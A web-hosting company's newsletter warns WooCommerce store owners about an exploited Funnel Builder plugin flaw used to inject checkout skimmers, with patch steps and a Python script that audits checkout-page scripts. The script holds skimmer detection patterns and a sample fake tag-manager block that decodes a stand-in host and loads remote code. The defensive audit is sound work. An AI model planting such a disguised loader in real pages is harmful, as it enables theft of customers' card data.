Is Your WooCommerce Checkout Putting Customer Payments at Risk?

Hey there,

If you run an online store on WooCommerce, you know how critical the checkout process is. It’s where trust meets transactions—your customers hand over their credit card details expecting a safe, seamless experience. But what if a popular plugin you rely on for funnels and checkouts has a hidden vulnerability letting attackers steal that data right in front of you?

That’s exactly what’s happening right now with the Funnel Builder plugin (by FunnelKit). The plugin is used by over 40,000 WooCommerce stores, and a critical flaw in versions before 3.15.0.3 is under active exploitation. Unauthenticated attackers can inject malicious JavaScript into your checkout pages, often disguised as legitimate analytics or Google Tag Manager code. This skimmer quietly captures credit card numbers, CVVs, billing addresses, and more as customers complete their purchases.

The vulnerability stems from an unprotected checkout endpoint that allowed anyone to modify global plugin settings. The injected script connects to a remote server and deploys tailored payment skimmers—classic Magecart-style tactics that blend in with normal tracking tags. Even if your site looks fine, customer data could be leaking without you knowing it.

What should you do immediately?

  • Update Funnel Builder to version 3.15.0.3 or newer right away.
  • Check your plugin settings (Settings > Checkout > External Scripts) for any unfamiliar code and remove it.
  • Review your recent orders and consider alerting affected customers if needed.
  • Scan your site for other potential issues.
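The second checklist item, checking for unfamiliar code, is easier to do consistently with a script than by eye, especially when a loader is dressed up as a tag-manager snippet. The example below is added here and is not code from the article or from FunnelKit: it parses a saved copy of your checkout page, lists every script, and flags external scripts from hosts you have not allowlisted and inline scripts that show the loader and skimmer traits the article describes (base64 decoding, dynamic script creation, references to card fields, beacon or image requests). The allowlist hosts, the sample page, the `GTM-XXXXXXX` id and the `.invalid` domains are constructed placeholders; adjust the allowlist to what your store actually loads. It also includes a small version check against the fixed release named above.

```python
"""Audit the <script> tags on a saved WooCommerce checkout page (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts you knowingly load scripts from. Assumption: edit this for your own store.
ALLOWED_SCRIPT_HOSTS = {
    "www.googletagmanager.com",
    "www.google-analytics.com",
    "js.stripe.com",
}

# Inline-script traits worth a second look: (label, regex) pairs.
SUSPICIOUS_PATTERNS = [
    ("decodes-base64",        re.compile(r"\batob\s*\(")),
    ("eval-or-function",      re.compile(r"\b(eval|Function)\s*\(")),
    ("char-code-building",    re.compile(r"fromCharCode")),
    ("dynamic-script-load",   re.compile(r"createElement\s*\(\s*['\"]script['\"]")),
    ("touches-card-fields",   re.compile(r"card[-_ ]?(number|cvc|cvv|expiry)", re.I)),
    ("beacon-or-image-request", re.compile(r"sendBeacon|new\s+Image\s*\(")),
]


class ScriptCollector(HTMLParser):
    """Collect (src, inline_body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._body = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._body = []

    def handle_data(self, data):
        # HTMLParser hands script content through as raw text, so this
        # captures the whole inline body.
        if self._body is not None:
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._body is not None:
            self.scripts.append((self._src, "".join(self._body)))
            self._src = None
            self._body = None


def audit_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, detail) findings for scripts that deserve manual review.

    External scripts are judged by host: relative URLs (the store's own files)
    are skipped, allowlisted hosts pass, anything else is reported. Inline
    scripts are reported when they match any SUSPICIOUS_PATTERNS entry.
    """
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = urlparse(src).hostname or ""
            if host and host not in allowed_hosts:
                findings.append(("unknown-external-host", host))
        else:
            hits = [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(body)]
            if hits:
                findings.append(("suspicious-inline", ",".join(hits)))
    return findings


def funnel_builder_is_vulnerable(version):
    """True when an installed Funnel Builder version predates the fixed 3.15.0.3."""
    return tuple(int(p) for p in version.split(".")) < (3, 15, 0, 3)


# Constructed sample page: a real GTM include, the store's own checkout script,
# a fake "tag manager" block that decodes a hidden URL and loads a script from
# it, and an analytics-looking script from an unrecognised host.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<!-- Google Tag Manager -->
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX"></script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<!-- Google Tag Manager -->
<script>
var u = atob("aHR0cHM6Ly9jb2xsZWN0b3IuZXhhbXBsZS5pbnZhbGlk");
var s = document.createElement("script"); s.src = u; document.head.appendChild(s);
</script>
<script src="https://cdn.stats.example.invalid/analytics.js"></script>
</head></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_html(SAMPLE_CHECKOUT_HTML):
        print(f"{kind}: {detail}")
    print("3.15.0.2 vulnerable:", funnel_builder_is_vulnerable("3.15.0.2"))
```

Save the checkout page from a browser (or with `curl`) and pass its contents to `audit_checkout_html`; anything reported should be traced back to the plugin setting or theme file that emits it before you decide whether it belongs. A clean run is not proof of a clean site, since the same check does not see scripts added only after a customer fills in the card form, so keep it alongside the plugin-settings review and a malware scan.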

This incident is a stark reminder: plugins extend your store’s power, but they also expand your attack surface. Small business owners and eCommerce entrepreneurs often juggle marketing, content, and operations—they shouldn’t also have to play full-time security expert.

At Karthost, we take the heavy lifting off your plate. Our managed WordPress hosting, powered by scalable Convesio containers on Google Cloud, delivers automatic performance scaling, built-in security protections, and reliable uptime—perfect for busy WooCommerce stores handling real traffic. Our VIP WordPress Care Plan includes regular updates to core, plugins, and popular themes, along with monthly site status reports and malware scanning. We handle the backend so you can focus on growing your business.

Whether you need rock-solid hosting that grows with your store, professional email solutions to match your brand, or expert support that truly understands small business needs, Karthost is here to keep your site fast, secure, and running smoothly.

Ready to stop worrying about updates, vulnerabilities, and performance? Visit karthost.com or check out our Managed WordPress Hosting and VIP Care Plans today.

Source: Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming
